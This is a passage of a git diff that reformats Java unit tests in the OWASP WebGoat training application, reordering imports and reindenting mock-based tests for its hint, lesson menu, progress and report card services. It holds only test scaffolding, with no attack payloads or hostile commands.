+++ b/src/test/java/org/owasp/webgoat/container/WebGoatApplication.java
@@ -5,6 +5,4 @@ import org.springframework.context.annotation.PropertySource;
 
 @SpringBootApplication(scanBasePackages = "org.owasp.webgoat.container")
 @PropertySource("classpath:application-webgoat.properties")
-public class WebGoatApplication {
-
-}
+public class WebGoatApplication {}
diff --git a/src/test/java/org/owasp/webgoat/container/assignments/AssignmentEndpointTest.java b/src/test/java/org/owasp/webgoat/container/assignments/AssignmentEndpointTest.java
index dd1fe4aa8..258919d81 100644
--- a/src/test/java/org/owasp/webgoat/container/assignments/AssignmentEndpointTest.java
+++ b/src/test/java/org/owasp/webgoat/container/assignments/AssignmentEndpointTest.java
@@ -25,47 +25,42 @@
 
 package org.owasp.webgoat.container.assignments;
 
+import java.util.Locale;
 import org.mockito.Mock;
 import org.owasp.webgoat.container.i18n.Language;
 import org.owasp.webgoat.container.i18n.Messages;
 import org.owasp.webgoat.container.i18n.PluginMessages;
 import org.owasp.webgoat.container.session.UserSessionData;
-import org.owasp.webgoat.container.users.UserTracker;
 import org.owasp.webgoat.container.session.WebSession;
+import org.owasp.webgoat.container.users.UserTracker;
 import org.owasp.webgoat.container.users.UserTrackerRepository;
 import org.springframework.context.support.ClassPathXmlApplicationContext;
-import org.springframework.core.io.support.ResourcePatternResolver;
 import org.springframework.test.util.ReflectionTestUtils;
 import org.springframework.web.servlet.i18n.FixedLocaleResolver;
 
-import java.util.Locale;
-
-//Do not remove is the base class for all assignments tests
+// Do not remove is the base class for all assignments tests
 public class AssignmentEndpointTest {
 
-    @Mock
-    protected UserTracker userTracker;
-    @Mock
-    protected UserTrackerRepository userTrackerRepository;
-    @Mock
-    protected WebSession webSession;
-    @Mock
-    protected UserSessionData userSessionData;
+  @Mock protected UserTracker userTracker;
+  @Mock protected UserTrackerRepository userTrackerRepository;
+  @Mock protected WebSession webSession;
+  @Mock protected UserSessionData userSessionData;
 
-    private Language language = new Language(new FixedLocaleResolver()) {
+  private Language language =
+      new Language(new FixedLocaleResolver()) {
         @Override
         public Locale getLocale() {
-            return Locale.ENGLISH;
+          return Locale.ENGLISH;
         }
-    };
-    protected Messages messages = new Messages(language);
-    protected PluginMessages pluginMessages = new PluginMessages(messages, language, new ClassPathXmlApplicationContext());
-
-    public void init(AssignmentEndpoint a) {
-        messages.setBasenames("classpath:/i18n/messages", "classpath:/i18n/WebGoatLabels");
-        ReflectionTestUtils.setField(a, "userSessionData", userSessionData);
-        ReflectionTestUtils.setField(a, "webSession", webSession);
-        ReflectionTestUtils.setField(a, "messages", pluginMessages);
-    }
+      };
+  protected Messages messages = new Messages(language);
+  protected PluginMessages pluginMessages =
+      new PluginMessages(messages, language, new ClassPathXmlApplicationContext());
 
+  public void init(AssignmentEndpoint a) {
+    messages.setBasenames("classpath:/i18n/messages", "classpath:/i18n/WebGoatLabels");
+    ReflectionTestUtils.setField(a, "userSessionData", userSessionData);
+    ReflectionTestUtils.setField(a, "webSession", webSession);
+    ReflectionTestUtils.setField(a, "messages", pluginMessages);
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/container/plugins/LessonTest.java b/src/test/java/org/owasp/webgoat/container/plugins/LessonTest.java
index 89b2a3cb5..465046c67 100644
--- a/src/test/java/org/owasp/webgoat/container/plugins/LessonTest.java
+++ b/src/test/java/org/owasp/webgoat/container/plugins/LessonTest.java
@@ -1,5 +1,11 @@
 package org.owasp.webgoat.container.plugins;
 
+import static org.mockito.Mockito.when;
+
+import java.util.List;
+import java.util.Locale;
+import java.util.function.Function;
+import javax.annotation.PostConstruct;
 import org.flywaydb.core.Flyway;
 import org.junit.jupiter.api.BeforeEach;
 import org.owasp.webgoat.container.WebGoat;
@@ -17,50 +23,41 @@ import org.springframework.test.context.TestPropertySource;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.web.context.WebApplicationContext;
 
-import javax.annotation.PostConstruct;
-import java.util.List;
-import java.util.Locale;
-import java.util.function.Function;
-
-import static org.mockito.Mockito.when;
-
 /**
  * @author nbaars
  * @since 5/20/17.
  */
 @SpringBootTest(webEnvironment = SpringBootTest.WebEnvironment.RANDOM_PORT, classes = WebGoat.class)
-@TestPropertySource(locations = {"classpath:/application-webgoat.properties", "classpath:/application-webgoat-test.properties"})
+@TestPropertySource(
+    locations = {
+      "classpath:/application-webgoat.properties",
+      "classpath:/application-webgoat-test.properties"
+    })
 public abstract class LessonTest {
 
-    @LocalServerPort
-    protected int localPort;
-    protected MockMvc mockMvc;
-    @Autowired
-    protected WebApplicationContext wac;
-    @Autowired
-    protected PluginMessages messages;
-    @Autowired
-    private Function<String, Flyway> flywayLessons;
-    @Autowired
-    private List<Initializeable> lessonInitializers;
-    @MockBean
-    protected WebSession webSession;
-    @MockBean
-    private Language language;
-    @Value("${webgoat.user.directory}")
-    protected String webGoatHomeDirectory;
+  @LocalServerPort protected int localPort;
+  protected MockMvc mockMvc;
+  @Autowired protected WebApplicationContext wac;
+  @Autowired protected PluginMessages messages;
+  @Autowired private Function<String, Flyway> flywayLessons;
+  @Autowired private List<Initializeable> lessonInitializers;
+  @MockBean protected WebSession webSession;
+  @MockBean private Language language;
 
-    @BeforeEach
-    void init() {
-        var user = new WebGoatUser("unit-test", "test");
-        when(webSession.getUserName()).thenReturn(user.getUsername());
-        when(webSession.getUser()).thenReturn(user);
-        when(language.getLocale()).thenReturn(Locale.getDefault());
-        lessonInitializers.forEach(init -> init.initialize(webSession.getUser()));
-    }
+  @Value("${webgoat.user.directory}")
+  protected String webGoatHomeDirectory;
 
-    @PostConstruct
-    public void createFlywayLessonTables() {
-        flywayLessons.apply("PUBLIC").migrate();
-    }
+  @BeforeEach
+  void init() {
+    var user = new WebGoatUser("unit-test", "test");
+    when(webSession.getUserName()).thenReturn(user.getUsername());
+    when(webSession.getUser()).thenReturn(user);
+    when(language.getLocale()).thenReturn(Locale.getDefault());
+    lessonInitializers.forEach(init -> init.initialize(webSession.getUser()));
+  }
+
+  @PostConstruct
+  public void createFlywayLessonTables() {
+    flywayLessons.apply("PUBLIC").migrate();
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/container/service/HintServiceTest.java b/src/test/java/org/owasp/webgoat/container/service/HintServiceTest.java
index d4b083f96..9ca5ffd05 100644
--- a/src/test/java/org/owasp/webgoat/container/service/HintServiceTest.java
+++ b/src/test/java/org/owasp/webgoat/container/service/HintServiceTest.java
@@ -1,5 +1,11 @@
 package org.owasp.webgoat.container.service;
 
+import static org.mockito.Mockito.when;
+import static org.owasp.webgoat.container.service.HintService.URL_HINTS_MVC;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
+import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
+
 import com.beust.jcommander.internal.Lists;
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
@@ -14,38 +20,30 @@ import org.owasp.webgoat.container.session.WebSession;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
-import static org.mockito.Mockito.when;
-import static org.owasp.webgoat.container.service.HintService.URL_HINTS_MVC;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
-import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
-
 @ExtendWith(MockitoExtension.class)
 public class HintServiceTest {
 
-    private MockMvc mockMvc;
-    @Mock
-    private WebSession websession;
-    @Mock
-    private Lesson lesson;
-    @Mock
-    private Assignment assignment;
+  private MockMvc mockMvc;
+  @Mock private WebSession websession;
+  @Mock private Lesson lesson;
+  @Mock private Assignment assignment;
 
-    @BeforeEach
-    void setup() {
-        this.mockMvc = standaloneSetup(new HintService(websession)).build();
-    }
+  @BeforeEach
+  void setup() {
+    this.mockMvc = standaloneSetup(new HintService(websession)).build();
+  }
 
-    @Test
-    void hintsPerAssignment() throws Exception {
-        Assignment assignment = Mockito.mock(Assignment.class);
-        when(assignment.getPath()).thenReturn("/HttpBasics/attack1");
-        when(assignment.getHints()).thenReturn(Lists.newArrayList("hint 1", "hint 2"));
-        when(lesson.getAssignments()).thenReturn(Lists.newArrayList(assignment));
-        when(websession.getCurrentLesson()).thenReturn(lesson);
-        mockMvc.perform(MockMvcRequestBuilders.get(URL_HINTS_MVC))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$[0].hint", CoreMatchers.is("hint 1")))
-                .andExpect(jsonPath("$[0].assignmentPath", CoreMatchers.is("/HttpBasics/attack1")));
-    }
+  @Test
+  void hintsPerAssignment() throws Exception {
+    Assignment assignment = Mockito.mock(Assignment.class);
+    when(assignment.getPath()).thenReturn("/HttpBasics/attack1");
+    when(assignment.getHints()).thenReturn(Lists.newArrayList("hint 1", "hint 2"));
+    when(lesson.getAssignments()).thenReturn(Lists.newArrayList(assignment));
+    when(websession.getCurrentLesson()).thenReturn(lesson);
+    mockMvc
+        .perform(MockMvcRequestBuilders.get(URL_HINTS_MVC))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$[0].hint", CoreMatchers.is("hint 1")))
+        .andExpect(jsonPath("$[0].assignmentPath", CoreMatchers.is("/HttpBasics/attack1")));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/container/service/LessonMenuServiceTest.java b/src/test/java/org/owasp/webgoat/container/service/LessonMenuServiceTest.java
index 5f7e1e751..388b3081e 100644
--- a/src/test/java/org/owasp/webgoat/container/service/LessonMenuServiceTest.java
+++ b/src/test/java/org/owasp/webgoat/container/service/LessonMenuServiceTest.java
@@ -21,7 +21,15 @@
  */
 package org.owasp.webgoat.container.service;
 
+import static org.mockito.ArgumentMatchers.any;
+import static org.mockito.Mockito.when;
+import static org.owasp.webgoat.container.service.LessonMenuService.URL_LESSONMENU_MVC;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
+import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
+
 import com.beust.jcommander.internal.Lists;
+import java.util.Arrays;
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
@@ -39,66 +47,63 @@ import org.owasp.webgoat.container.users.UserTrackerRepository;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
-import java.util.Arrays;
-
-import static org.mockito.ArgumentMatchers.any;
-import static org.mockito.Mockito.when;
-import static org.owasp.webgoat.container.service.LessonMenuService.URL_LESSONMENU_MVC;
-import static org.springframework.test.web.servlet.result.MockMvcResultHandlers.print;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
-import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
-
 @ExtendWith(MockitoExtension.class)
 public class LessonMenuServiceTest {
 
-    @Mock(lenient=true)
-    private LessonTracker lessonTracker;
-    @Mock
-    private Course course;
-    @Mock
-    private UserTracker userTracker;
-    @Mock
-    private UserTrackerRepository userTrackerRepository;
-    @Mock
-    private WebSession webSession;
-    private MockMvc mockMvc;
+  @Mock(lenient = true)
+  private LessonTracker lessonTracker;
 
-    @BeforeEach
-    void setup() {
-        this.mockMvc = standaloneSetup(new LessonMenuService(course, webSession, userTrackerRepository, Arrays.asList("none"), Arrays.asList("none"))).build();
-    }
+  @Mock private Course course;
+  @Mock private UserTracker userTracker;
+  @Mock private UserTrackerRepository userTrackerRepository;
+  @Mock private WebSession webSession;
+  private MockMvc mockMvc;
 
-    @Test
-    void lessonsShouldBeOrdered() throws Exception {
-        Lesson l1 = Mockito.mock(Lesson.class);
-        Lesson l2 = Mockito.mock(Lesson.class);
-        when(l1.getTitle()).thenReturn("ZA");
-        when(l2.getTitle()).thenReturn("AA");
-        when(lessonTracker.isLessonSolved()).thenReturn(false);
-        when(course.getLessons(any())).thenReturn(Lists.newArrayList(l1, l2));
-        when(course.getCategories()).thenReturn(Lists.newArrayList(Category.A1));
-        when(userTracker.getLessonTracker(any(Lesson.class))).thenReturn(lessonTracker);
-        when(userTrackerRepository.findByUser(any())).thenReturn(userTracker);
+  @BeforeEach
+  void setup() {
+    this.mockMvc =
+        standaloneSetup(
+                new LessonMenuService(
+                    course,
+                    webSession,
+                    userTrackerRepository,
+                    Arrays.asList("none"),
+                    Arrays.asList("none")))
+            .build();
+  }
 
-        mockMvc.perform(MockMvcRequestBuilders.get(URL_LESSONMENU_MVC))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$[0].children[0].name", CoreMatchers.is("AA")))
-                .andExpect(jsonPath("$[0].children[1].name", CoreMatchers.is("ZA")));
-    }
+  @Test
+  void lessonsShouldBeOrdered() throws Exception {
+    Lesson l1 = Mockito.mock(Lesson.class);
+    Lesson l2 = Mockito.mock(Lesson.class);
+    when(l1.getTitle()).thenReturn("ZA");
+    when(l2.getTitle()).thenReturn("AA");
+    when(lessonTracker.isLessonSolved()).thenReturn(false);
+    when(course.getLessons(any())).thenReturn(Lists.newArrayList(l1, l2));
+    when(course.getCategories()).thenReturn(Lists.newArrayList(Category.A1));
+    when(userTracker.getLessonTracker(any(Lesson.class))).thenReturn(lessonTracker);
+    when(userTrackerRepository.findByUser(any())).thenReturn(userTracker);
 
-    @Test
-    void lessonCompleted() throws Exception {
-        Lesson l1 = Mockito.mock(Lesson.class);
-        when(l1.getTitle()).thenReturn("ZA");
-        when(lessonTracker.isLessonSolved()).thenReturn(true);
-        when(course.getLessons(any())).thenReturn(Lists.newArrayList(l1));
-        when(course.getCategories()).thenReturn(Lists.newArrayList(Category.A1));
-        when(userTracker.getLessonTracker(any(Lesson.class))).thenReturn(lessonTracker);
-        when(userTrackerRepository.findByUser(any())).thenReturn(userTracker);
+    mockMvc
+        .perform(MockMvcRequestBuilders.get(URL_LESSONMENU_MVC))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$[0].children[0].name", CoreMatchers.is("AA")))
+        .andExpect(jsonPath("$[0].children[1].name", CoreMatchers.is("ZA")));
+  }
 
-        mockMvc.perform(MockMvcRequestBuilders.get(URL_LESSONMENU_MVC))
-                .andExpect(status().isOk())//.andDo(print())
-                .andExpect(jsonPath("$[0].children[0].complete", CoreMatchers.is(true)));
-    }
+  @Test
+  void lessonCompleted() throws Exception {
+    Lesson l1 = Mockito.mock(Lesson.class);
+    when(l1.getTitle()).thenReturn("ZA");
+    when(lessonTracker.isLessonSolved()).thenReturn(true);
+    when(course.getLessons(any())).thenReturn(Lists.newArrayList(l1));
+    when(course.getCategories()).thenReturn(Lists.newArrayList(Category.A1));
+    when(userTracker.getLessonTracker(any(Lesson.class))).thenReturn(lessonTracker);
+    when(userTrackerRepository.findByUser(any())).thenReturn(userTracker);
+
+    mockMvc
+        .perform(MockMvcRequestBuilders.get(URL_LESSONMENU_MVC))
+        .andExpect(status().isOk()) // .andDo(print())
+        .andExpect(jsonPath("$[0].children[0].complete", CoreMatchers.is(true)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/container/service/LessonProgressServiceTest.java b/src/test/java/org/owasp/webgoat/container/service/LessonProgressServiceTest.java
index 3672e733f..25043330a 100644
--- a/src/test/java/org/owasp/webgoat/container/service/LessonProgressServiceTest.java
+++ b/src/test/java/org/owasp/webgoat/container/service/LessonProgressServiceTest.java
@@ -1,13 +1,20 @@
 package org.owasp.webgoat.container.service;
 
+import static org.hamcrest.CoreMatchers.is;
+import static org.mockito.ArgumentMatchers.any;
+import static org.mockito.Mockito.when;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
+
+import java.util.List;
 import org.assertj.core.util.Maps;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.Mock;
 import org.mockito.junit.jupiter.MockitoExtension;
-import org.owasp.webgoat.container.lessons.Lesson;
 import org.owasp.webgoat.container.lessons.Assignment;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.owasp.webgoat.container.session.WebSession;
 import org.owasp.webgoat.container.users.LessonTracker;
 import org.owasp.webgoat.container.users.UserTracker;
@@ -17,37 +24,30 @@ import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 
-import java.util.List;
-
-import static org.hamcrest.CoreMatchers.is;
-import static org.mockito.ArgumentMatchers.any;
-import static org.mockito.Mockito.when;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
-
 /**
  * ************************************************************************************************
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
+ *
  * <p>
  *
  * @author nbaars
@@ -57,35 +57,35 @@ import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.
 @ExtendWith(MockitoExtension.class)
 class LessonProgressServiceTest {
 
-    private MockMvc mockMvc;
+  private MockMvc mockMvc;
 
-    @Mock
-    private Lesson lesson;
-    @Mock
-    private UserTracker userTracker;
-    @Mock
-    private LessonTracker lessonTracker;
-    @Mock
-    private UserTrackerRepository userTrackerRepository;
-    @Mock
-    private WebSession websession;
+  @Mock private Lesson lesson;
+  @Mock private UserTracker userTracker;
+  @Mock private LessonTracker lessonTracker;
+  @Mock private UserTrackerRepository userTrackerRepository;
+  @Mock private WebSession websession;
 
-    @BeforeEach
-    void setup() {
-        Assignment assignment = new Assignment("test", "test", List.of());
-        when(userTrackerRepository.findByUser(any())).thenReturn(userTracker);
-        when(userTracker.getLessonTracker(any(Lesson.class))).thenReturn(lessonTracker);
-        when(websession.getCurrentLesson()).thenReturn(lesson);
-        when(lessonTracker.getLessonOverview()).thenReturn(Maps.newHashMap(assignment, true));
-        this.mockMvc = MockMvcBuilders.standaloneSetup(new LessonProgressService(userTrackerRepository, websession)).build();
-    }
-
-    @Test
-    void jsonLessonOverview() throws Exception {
-        this.mockMvc.perform(MockMvcRequestBuilders.get("/service/lessonoverview.mvc").accept(MediaType.APPLICATION_JSON_VALUE))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$[0].assignment.name", is("test")))
-                .andExpect(jsonPath("$[0].solved", is(true)));
-    }
+  @BeforeEach
+  void setup() {
+    Assignment assignment = new Assignment("test", "test", List.of());
+    when(userTrackerRepository.findByUser(any())).thenReturn(userTracker);
+    when(userTracker.getLessonTracker(any(Lesson.class))).thenReturn(lessonTracker);
+    when(websession.getCurrentLesson()).thenReturn(lesson);
+    when(lessonTracker.getLessonOverview()).thenReturn(Maps.newHashMap(assignment, true));
+    this.mockMvc =
+        MockMvcBuilders.standaloneSetup(
+                new LessonProgressService(userTrackerRepository, websession))
+            .build();
+  }
 
+  @Test
+  void jsonLessonOverview() throws Exception {
+    this.mockMvc
+        .perform(
+            MockMvcRequestBuilders.get("/service/lessonoverview.mvc")
+                .accept(MediaType.APPLICATION_JSON_VALUE))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$[0].assignment.name", is("test")))
+        .andExpect(jsonPath("$[0].solved", is(true)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/container/service/ReportCardServiceTest.java b/src/test/java/org/owasp/webgoat/container/service/ReportCardServiceTest.java
index 86c0b57f0..3df0efb76 100644
--- a/src/test/java/org/owasp/webgoat/container/service/ReportCardServiceTest.java
+++ b/src/test/java/org/owasp/webgoat/container/service/ReportCardServiceTest.java
@@ -1,5 +1,14 @@
 package org.owasp.webgoat.container.service;
 
+import static org.hamcrest.CoreMatchers.is;
+import static org.mockito.ArgumentMatchers.any;
+import static org.mockito.ArgumentMatchers.anyString;
+import static org.mockito.Mockito.when;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
+import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
+
+import java.util.List;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
@@ -16,57 +25,44 @@ import org.springframework.security.test.context.support.WithMockUser;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
-import java.util.List;
-
-import static org.hamcrest.CoreMatchers.is;
-import static org.mockito.ArgumentMatchers.any;
-import static org.mockito.ArgumentMatchers.anyString;
-import static org.mockito.Mockito.when;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
-import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
-
 @ExtendWith(MockitoExtension.class)
 public class ReportCardServiceTest {
 
-    private MockMvc mockMvc;
-    @Mock
-    private Course course;
-    @Mock
-    private UserTracker userTracker;
-    @Mock
-    private Lesson lesson;
-    @Mock
-    private LessonTracker lessonTracker;
-    @Mock
-    private UserTrackerRepository userTrackerRepository;
-    @Mock
-    private WebSession websession;
-    @Mock
-    private PluginMessages pluginMessages;
+  private MockMvc mockMvc;
+  @Mock private Course course;
+  @Mock private UserTracker userTracker;
+  @Mock private Lesson lesson;
+  @Mock private LessonTracker lessonTracker;
+  @Mock private UserTrackerRepository userTrackerRepository;
+  @Mock private WebSession websession;
+  @Mock private PluginMessages pluginMessages;
 
-    @BeforeEach
-    void setup() {
-        this.mockMvc = standaloneSetup(new ReportCardService(websession, userTrackerRepository, course, pluginMessages)).build();
-        when(pluginMessages.getMessage(anyString())).thenReturn("Test");
-    }
+  @BeforeEach
+  void setup() {
+    this.mockMvc =
+        standaloneSetup(
+                new ReportCardService(websession, userTrackerRepository, course, pluginMessages))
+            .build();
+    when(pluginMessages.getMessage(anyString())).thenReturn("Test");
+  }
 
-    @Test
-    @WithMockUser(username = "guest", password = "guest")
-    void withLessons() throws Exception {
-        when(lesson.getTitle()).thenReturn("Test");
-        when(course.getTotalOfLessons()).thenReturn(1);
-        when(course.getTotalOfAssignments()).thenReturn(10);
-        when(course.getLessons()).thenAnswer(x -> List.of(lesson));
-        when(userTrackerRepository.findByUser(any())).thenReturn(userTracker);
-        when(userTracker.getLessonTracker(any(Lesson.class))).thenReturn(lessonTracker);
-        mockMvc.perform(MockMvcRequestBuilders.get("/service/reportcard.mvc"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.totalNumberOfLessons", is(1)))
-                .andExpect(jsonPath("$.solvedLessons", is(0)))
-                .andExpect(jsonPath("$.numberOfAssignmentsSolved", is(0)))
-                .andExpect(jsonPath("$.totalNumberOfAssignments", is(10)))
-                .andExpect(jsonPath("$.lessonStatistics[0].name", is("Test")))
-                .andExpect(jsonPath("$.numberOfAssignmentsSolved", is(0)));
-    }
+  @Test
+  @WithMockUser(username = "guest", password = "guest")
+  void withLessons() throws Exception {
+    when(lesson.getTitle()).thenReturn("Test");
+    when(course.getTotalOfLessons()).thenReturn(1);
+    when(course.getTotalOfAssignments()).thenReturn(10);
+    when(course.getLessons()).thenAnswer(x -> List.of(lesson));
+    when(userTrackerRepository.findByUser(any())).thenReturn(userTracker);
+    when(userTracker.getLessonTracker(any(Lesson.class))).thenReturn(lessonTracker);
+    mockMvc
+        .perform(MockMvcRequestBuilders.get("/service/reportcard.mvc"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.totalNumberOfLessons", is(1)))
+        .andExpect(jsonPath("$.solvedLessons", is(0)))
+        .andExpect(jsonPath("$.numberOfAssignmentsSolved", is(0)))
+        .andExpect(jsonPath("$.totalNumberOfAssignments", is(10)))
+        .andExpect(jsonPath("$.lessonStatistics[0].name", is("Test")))
+        .andExpect(jsonPath("$.numberOfAssignmentsSolved", is(0)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/container/session/LabelDebuggerTest.java b/src/test/java/org/owasp/webgoat/container/session/LabelDebuggerTest.java
index 593e6d88d..8d2d02de5 100644
--- a/src/test/java/org/owasp/webgoat/container/session/LabelDebuggerTest.java
+++ b/src/test/java/org/owasp/webgoat/container/session/LabelDebuggerTest.java
@@ -5,41 +5,38 @@ import org.junit.jupiter.api.Test;
 
 class LabelDebuggerTest {
 
-    @Test
-    void testSetEnabledTrue() {
-        LabelDebugger ld = new LabelDebugger();
-        ld.setEnabled(true);
-        Assertions.assertThat(ld.isEnabled()).isTrue();
-    }
+  @Test
+  void testSetEnabledTrue() {
+    LabelDebugger ld = new LabelDebugger();
+    ld.setEnabled(true);
+    Assertions.assertThat(ld.isEnabled()).isTrue();
+  }
 
-    @Test
-    void testSetEnabledFalse() {
-        LabelDebugger ld = new LabelDebugger();
-        ld.setEnabled(false);
-        Assertions.assertThat((ld.isEnabled())).isFalse();
-    }
-
-    @Test
-    void testSetEnabledNullThrowsException() {
-        LabelDebugger ld = new LabelDebugger();
-        ld.setEnabled(true);
-        Assertions.assertThat((ld.isEnabled())).isTrue();
-    }
-
-    @Test
-    void testEnableIsTrue() {
-        LabelDebugger ld = new LabelDebugger();
-        ld.enable();
-        Assertions.assertThat((ld.isEnabled())).isTrue();
-    }
-
-    @Test
-    void testDisableIsFalse() {
-        LabelDebugger ld = new LabelDebugger();
-        ld.disable();
-        Assertions.assertThat((ld.isEnabled())).isFalse();
-    }
+  @Test
+  void testSetEnabledFalse() {
+    LabelDebugger ld = new LabelDebugger();
+    ld.setEnabled(false);
+    Assertions.assertThat((ld.isEnabled())).isFalse();
+  }
 
+  @Test
+  void testSetEnabledNullThrowsException() {
+    LabelDebugger ld = new LabelDebugger();
+    ld.setEnabled(true);
+    Assertions.assertThat((ld.isEnabled())).isTrue();
+  }
 
+  @Test
+  void testEnableIsTrue() {
+    LabelDebugger ld = new LabelDebugger();
+    ld.enable();
+    Assertions.assertThat((ld.isEnabled())).isTrue();
+  }
 
+  @Test
+  void testDisableIsFalse() {
+    LabelDebugger ld = new LabelDebugger();
+    ld.disable();
+    Assertions.assertThat((ld.isEnabled())).isFalse();
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/container/session/LessonTrackerTest.java b/src/test/java/org/owasp/webgoat/container/session/LessonTrackerTest.java
index b02ba2e72..033b136e8 100644
--- a/src/test/java/org/owasp/webgoat/container/session/LessonTrackerTest.java
+++ b/src/test/java/org/owasp/webgoat/container/session/LessonTrackerTest.java
@@ -1,41 +1,41 @@
 package org.owasp.webgoat.container.session;
 
+import static org.assertj.core.api.Assertions.assertThat;
+import static org.mockito.Mockito.mock;
+import static org.mockito.Mockito.when;
+
+import java.util.List;
+import java.util.Map;
 import org.assertj.core.api.Assertions;
 import org.junit.jupiter.api.Test;
 import org.owasp.webgoat.container.lessons.Assignment;
 import org.owasp.webgoat.container.lessons.Lesson;
 import org.owasp.webgoat.container.users.LessonTracker;
 
-import java.util.List;
-import java.util.Map;
-
-import static org.assertj.core.api.Assertions.assertThat;
-import static org.mockito.Mockito.mock;
-import static org.mockito.Mockito.when;
-
 /**
  * ************************************************************************************************
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
